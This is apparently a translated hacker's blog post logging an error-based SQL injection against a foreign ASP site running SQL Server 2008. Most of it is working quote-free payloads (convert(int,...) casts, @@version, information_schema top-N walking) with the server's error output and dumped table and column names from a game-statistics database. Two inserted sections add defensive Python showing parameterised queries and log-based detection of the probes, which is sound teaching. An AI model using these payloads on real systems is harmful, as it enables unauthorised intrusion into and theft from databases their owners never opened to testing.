By: 鬼画符
A simple test against SQL Server 2008 in error-display mode: a way through where single quotes are not supported.
----------------------------------------------------------------------
Getting the database name
http://www.xxtt.com/xxtt.asp?id=10 and (len(db_name()))=7
http://www.xxtt.com/xxtt.asp?id=(select convert(int,(db_name()))) ddxxzz
Conversion failed when converting the nvarchar value 'ddxxzz' to data type int.
http://www.xxtt.com/xxtt.asp?id=(select convert(int,(user))) ddxxzz
http://www.xxtt.com/xxtt.asp?id=convert(int,(select host_name())) SV3141
http://www.xxtt.com/xxtt.asp?id=10 or 1=convert(int,(@@version))
Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) Apr 2 2010 15:48:46 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)
http://www.xxtt.com/xxtt.asp?id=10 and (select count(table_name) from information_schema.tables)=642 642 tables
http://www.xxtt.com/xxtt.asp?id=(select top 1 table_name from information_schema.tables) wow_toons_321
http://www.xxtt.com/xxtt.asp?id=(select top 1 table_name from information_schema.tables where table_name not in('wow_toons_321'))
http://www.xxtt.com/xxtt.asp?id=(select top 1 table_name from information_schema.tables where table_name not in(1)) sysrscols
http://www.xxtt.com/xxtt.asp?id=(select top 1 column_name from information_schema.columns)
ID rsid
http://www.xxtt.com/xxtt.asp?id=10 "&"or 1=convert(int,(@@version))
An object or column name is missing or empty. For SELECT INTO statements, verify each column has a name. For other statements, look for empty alias names. Aliases defined as "" or [] are not allowed. Change the alias to a valid name.
http://www.xxtt.com/xxtt.asp?id=(select * from wow_toons_321)
Only one expression can be specified in the select list when the subquery is not introduced with EXISTS.
Subquery returned more than 1 value. This is not permitted when the subquery follows =, !=, <, <= , >, >= or when the subquery is used as an expression.
http://www.xxtt.com/xxtt.asp?id=10"
An object or column name is missing or empty. For SELECT INTO statements, verify each column has a name. For other statements, look for empty alias names. Aliases defined as "" or [] are not allowed. Change the alias to a valid name.
http://www.xxtt.com/xxtt.asp?id="10
Unclosed quotation mark after the character string '10'.
http://www.xxtt.com/xxtt.asp?id="10"
Invalid column name '10'.
http://www.xxtt.com/xxtt.asp?id=10 as a
Incorrect syntax near the keyword 'as'.
http://www.xxtt.com/xxtt.asp?id=(select db_name())
Conversion failed when converting the nvarchar value 'ddxxzz' to data type int.
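Added example (not from the original post): none of the probes above needs a single quote because the id value is spliced into a numeric comparison, so any expression the engine accepts is evaluated as-is, and the error-display mode then hands the engine's message back to the client. The snippet below shows that pattern beside a parameterised version that enforces the integer type and returns a generic error. Python's sqlite3 is used as an offline stand-in for SQL Server 2008; the table, column and function names are constructed for the demo, not taken from the site.

```python
import sqlite3

# Constructed sample table; SQLite stands in for SQL Server 2008 here so
# the demo runs offline (assumption: the site keyed its rows on an integer id).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, title TEXT, secret TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?, ?)", [
        (10, "public ten", "s10"),
        (11, "public eleven", "s11"),
        (12, "hidden", "s12"),
    ])
    return conn

def lookup_vulnerable(conn, raw_id):
    # Hypothetical reconstruction of the page's query: the id parameter is
    # spliced in unquoted. In a numeric context any expression is evaluated,
    # which is why the probes above need no quote character at all.
    sql = "SELECT id, title FROM items WHERE id=" + raw_id
    return conn.execute(sql).fetchall()

def lookup_parameterised(conn, raw_id):
    # Hardened form: enforce the type in application code, then bind the
    # value. Nothing the client sends ever becomes part of the SQL text.
    try:
        item_id = int(raw_id)
    except ValueError:
        raise ValueError("id must be an integer") from None
    return conn.execute("SELECT id, title FROM items WHERE id=?", (item_id,)).fetchall()

SERVER_LOG = []  # stands in for the application's own log sink

def handle_request_vulnerable(conn, raw_id):
    # Error-display mode: the engine's message is returned to the client,
    # which is the channel the convert(int, ...) probes read data from.
    try:
        return {"status": 200, "rows": lookup_vulnerable(conn, raw_id)}
    except sqlite3.Error as exc:
        return {"status": 500, "error": str(exc)}

def handle_request_hardened(conn, raw_id):
    # Detail goes to the server-side log; the client gets a fixed message.
    try:
        return {"status": 200, "rows": lookup_parameterised(conn, raw_id)}
    except (ValueError, sqlite3.Error) as exc:
        SERVER_LOG.append(repr(exc))
        return {"status": 400, "error": "invalid request"}

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "10 or 1=1"))                     # every row
    print(lookup_vulnerable(db, "(select max(id) from items)"))   # row chosen by a subquery
    print(handle_request_vulnerable(db, "10 as a"))               # engine error text reaches the client
    print(handle_request_hardened(db, "10 or 1=1"))               # rejected with a generic message
```

The two fixes are independent and both matter: binding alone still leaks the engine's text if exceptions are rendered to the page, and hiding errors alone only pushes the same injection towards blind techniques.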
----------------------------------------------------------------------
http://www.xxtt.com/xxtt.asp?id=convert(int,(select name from master.dbo.sysdatabases where dbid=11))
select * from [ddxxzz].dbo.sysobjects where xtype='u'
http://www.xxtt.com/xxtt.asp?id=convert(int,(select top 1 id from [ddxxzz].dbo.sysobjects where xtype='u'))
----------------------------------------------------------------------------------------------------------------
http://www.xxtt.com/xxtt.asp?id=(select top 1 table_name from information_schema.tables where table_name not in(select top 641 table_name from information_schema.tables))
----642----
wow_toons_15 642
wow_characters 641
wow_toons_388
wow_toons_82
wow_toons_284
wow_toons_top
wow_toons_457
wow_toons_149
wow_toons_1577
wow_toons_217
wow_toons_1645
wow_toons_48
wow_toons_1720
wow_toons_422
wow_toons_115
wow_toons_319
wow_toons_493
wow_toons_182
wow_toons_352
wow_toons_1610
wow_toons_250
wow_toons_387
wow_toons_81
wow_toons_283
wow_toons_456
wow_toons_148
wow_toons_1576
wow_toons_216
wow_toons_1644
wow_toons_47
wow_toons_1719 611
wow_toons_421
wow_toons_114
wow_toons_318
wow_toons_492
wow_toons_181
wow_toons_1609
wow_characters 641
wow_alerts 587
wow_toons 538
wow_realms 508
wow_ExcludeProgress 457
wow_guilds 453
wow_guildmoves 425
wow_Achievements 412 26
wow_ads 399 12 Name,
wow_guilds_top 348
wow_toons_top 336
wow_rankhistory 304 19
wow_criteria 288
wow_submitters 254
wow_toons_oldest_EUP 236
wow_toons_oldest_EU 233
wow_toons_oldest_USP 228
wow_toons_oldest_US 222
wow_Messages 216
wow_toons_oldest_TWP 214
wow_toons_oldest_TW 211
wow_guildachievements
wow_achhistory 149 11
wow_deletedtoons 133
wow_NAchievements 122 8
wow_stats 111 20
wow_lootrank 13 5
------------------------------------------------column_name--------------------------------------------------------
select top 1 column_name from information_schema.columns where table_name in(select top 1 table_name from information_schema.tables where table_name not in(select top 641 table_name from information_schema.tables))
select count(column_name) from information_schema.columns where table_name in(select top 1 table_name from information_schema.tables where table_name not in(select top 641 table_name from information_schema.tables))
Table wow_toons_15, 23 columns
http://www.xxtt.com/xxtt.asp?id=10 and (select count(column_name) from information_schema.columns where table_name in(select top 1 table_name from information_schema.tables where table_name not in(select top 641 table_name from information_schema.tables)))=23
select top 1 column_name from information_schema.columns where column_name not in(select top 22 column_name from information_schema.columns where table_name in(select top 1 table_name from information_schema.tables where table_name not in(select top 641 table_name from information_schema.tables)))
http://www.xxtt.com/xxtt.asp?id=(select top 1 column_name from information_schema.columns where column_name not in(select top 22 column_name from information_schema.columns where table_name in(select top 1 table_name from information_schema.tables where table_name not in(select top 641 table_name from information_schema.tables))))
Columns of table wow_toons_15 in detail
firstHeroickills
firstNormalkills
firstAchpoints
firstHKs
Lastseen
Clevel
BGr
HKs
AchPoints
gs
normalkills
heroickills
av_ilevel
SpecID
Race
Class
Location
Guild
Realm
PvPItems
Dateseen
Achievement
ID
-------------------------------------------------------------------------------------------------------------------
Table wow_toons_388, 23 columns
http://www.xxtt.com/xxtt.asp?id=10 and (select count(column_name) from information_schema.columns where table_name in(select top 1 table_name from information_schema.tables where table_name not in(select top 639 table_name from information_schema.tables)))=23
Columns in detail
http://www.xxtt.com/xxtt.asp?id=(select top 1 column_name from information_schema.columns where column_name not in(select top 23 column_name from information_schema.columns where table_name in(select top 1 table_name from information_schema.tables where table_name not in(select top 639 table_name from information_schema.tables))))
firstHeroickills
firstNormalkills
firstAchpoints
firstHKs
Lastseen
Clevel
BGr
HKs
AchPoints
gs
normalkills
heroickills
av_ilevel
SpecID
Race
Class
Location
Guild
Realm
PvPItems
Dateseen
Achievement
ID
-------------------------------------------------------------------------------------------------------------------
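Added example (not part of the original write-up): detection logic for the probing shown throughout this page, run over constructed web-server log lines that reproduce the request shapes above. The log layout, the client addresses and the regexes are assumptions made for the demo; the response error strings are the SQL Server messages quoted on this page. The point a defender should take from the table and column walks above is that each step is one request, so the count of flagged requests per client is the real signal, not any single hit.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed log lines in a simplified IIS W3C layout (assumption):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
# The request shapes mirror the probes quoted in the write-up.
SAMPLE_LOG = """\
2024-01-01 10:00:00 203.0.113.5 GET /xxtt.asp id=10 200
2024-01-01 10:00:05 203.0.113.5 GET /xxtt.asp id=10%20and%20(len(db_name()))=7 200
2024-01-01 10:00:16 203.0.113.5 GET /xxtt.asp id=(select%20convert(int,(db_name()))) 500
2024-01-01 10:00:34 198.51.100.7 GET /xxtt.asp id=42 200
2024-01-01 10:00:47 203.0.113.5 GET /xxtt.asp id=10%20or%201=convert(int,(@@version)) 500
2024-01-01 10:01:15 203.0.113.5 GET /xxtt.asp id=(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in(select%20top%20641%20table_name%20from%20information_schema.tables)) 500
"""

LOG_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+) (\S+) (\d{3})$")

# Signatures of the quote-free, SQL Server specific probes seen above.
PROBE_PATTERNS = {
    "error-based cast": re.compile(r"convert\s*\(\s*int\s*,", re.I),
    "version/identity probe": re.compile(r"@@version|db_name\s*\(|host_name\s*\(", re.I),
    "schema enumeration": re.compile(r"information_schema\.|\bsysobjects\b|\bsysdatabases\b", re.I),
    "top-N walking": re.compile(r"not\s+in\s*\(\s*select\s+top\s+\d+", re.I),
    "boolean condition": re.compile(r"^\d+\s+(and|or)\s+", re.I),
}

# SQL Server messages quoted on this page; seeing one in a response body
# means the application echoes engine errors to the client.
ERROR_SIGNATURES = (
    "Conversion failed when converting",
    "Unclosed quotation mark after the character string",
    "Incorrect syntax near",
    "Invalid column name",
    "Only one expression can be specified in the select list",
    "Subquery returned more than 1 value",
    "An object or column name is missing or empty",
)

def classify_query(query):
    """Names of every probe signature that matches the decoded query string."""
    params = [p.partition("=")[2] for p in unquote_plus(query).split("&")]
    hits = []
    for name, pat in PROBE_PATTERNS.items():
        # Test each parameter value on its own so '^' anchors per value.
        if any(pat.search(value) for value in params):
            hits.append(name)
    return hits

def scan_log(text):
    """Parse log lines and return one finding per request that matches a probe."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the scan
        when, ip, method, stem, query, status = m.groups()
        hits = classify_query(query)
        if hits:
            findings.append({"time": when, "ip": ip, "method": method, "uri": stem,
                             "status": int(status), "signatures": hits})
    return findings

def suspicious_clients(findings, threshold=3):
    """Clients with at least `threshold` flagged requests: walking 642 tables
    and their columns takes hundreds of requests, so the count is the signal."""
    counts = Counter(f["ip"] for f in findings)
    return {ip: n for ip, n in counts.items() if n >= threshold}

def leaks_db_error(body):
    """True if an HTTP response body echoes one of the quoted engine messages."""
    return any(sig in body for sig in ERROR_SIGNATURES)

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f["time"], f["ip"], f["status"], ", ".join(f["signatures"]))
    print("suspicious:", suspicious_clients(found))
```

The 500 responses in the sample are a second, independent indicator: a client whose flagged requests also produce server errors is exercising exactly the error channel the page relies on, and leaks_db_error() applied to response bodies (from a proxy or application log) confirms whether that channel is open.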
A test against a foreign site. Although the result was not what I wanted, I learned a method for getting through where single quotes are not supported. I thought about it for a long time; I am a humble novice, so please forgive me, masters.